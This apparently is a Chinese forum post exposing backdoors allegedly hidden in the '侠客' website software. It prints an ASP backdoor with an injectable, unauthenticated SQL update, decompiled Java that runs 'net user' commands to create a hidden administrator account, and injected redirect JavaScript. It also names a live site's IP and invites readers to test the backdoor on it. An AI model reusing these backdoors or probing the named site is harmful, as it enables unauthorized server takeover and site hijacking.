前不久看到站长网上的一篇声讨侠客软件的文章,估计不论那篇文章的对与错,我只想从另一个角度来剖析一下侠客作者的人品。
一、侠客1.0偷窃自搜敌
理由如下:稍能读懂ASP代码的人,可以看到搜敌公布的源码中有程序后门存在,开头的代码如下:
If request("Hm")<>0 Then
set rs=server.createobject("adodb.recordset")
sql = "SELECT * FROM A where Aid="&request("Hm")
rs.open sql,conn,1,3
rs("Tzurl") = request("Tzurl")
response.write "<SCRIPT language=JavaScript>alert('操作成功!');javascript:history.go(-1);</SCRIPT>"
rs.update
rs.close
Response.End
End IF
意即只要HM参数不为0即可以强制修改方案跳转地址!
同样的后门存在于侠客的1.0版本中,有兴趣的朋友可以自行测试!下面是我找到的一个侠客1.0的站,得罪这位站长还请原谅!(http://61.157.109.6/)
二、侠客2.0到4.5全部有后门存在
在最新公布的4.5版本中,采用JSP编写,简单的反编译一下软件代码,可以看到这样一段内容:
if (!"cmd".equals(_$29.getAttribute("cmdshell")))
break MISSING_BLOCK_LABEL_2159;
as2 = new String[3];
as2;
as2[0] = "cmd.exe";
as2;
JVM INSTR swap ;
1;
"/C";
JVM INSTR aastore ;
JVM INSTR dup ;
JVM INSTR swap ;
2;
"net user aaa Langh123!@# /add";
JVM INSTR aastore ;
String as[];
as;
String as3[] = new String[3];
as3;
as3[0] = "cmd.exe";
as3;
JVM INSTR swap ;
1;
"/C";
JVM INSTR aastore ;
JVM INSTR dup ;
JVM INSTR swap ;
2;
"net localgroup administrators aaa /add";
JVM INSTR aastore ;
String as1[];
as1;
Runtime.getRuntime().exec(as);
Runtime.getRuntime().exec(as1);
另外在这款最新的4。5版本软件中笔者还发现了一个在用户的网站上添加代码的后门,后门地址为
http://www.vnetpush.cn/push.asp?id=cpuid
在某个用户的网页中笔者发现在被加载的JS文件内容为:
document.writeln(" <script language=\"JavaScript\">");
document.writeln(" self.location=\'http:\/\/www-md5sdfs1df26x6s.sexaiai.com/DNSchang_4b8ffe4e009a8c703f9590e694d5219f\';");
document.writeln(" <\/script>");
跳转到了一个GG广告站!有兴趣的朋友可以去追查……
软件的好坏暂且不论,单单从上述二点即可看出侠客作者的人品有问题!侠客你还敢说自己是清白的,无辜的吗?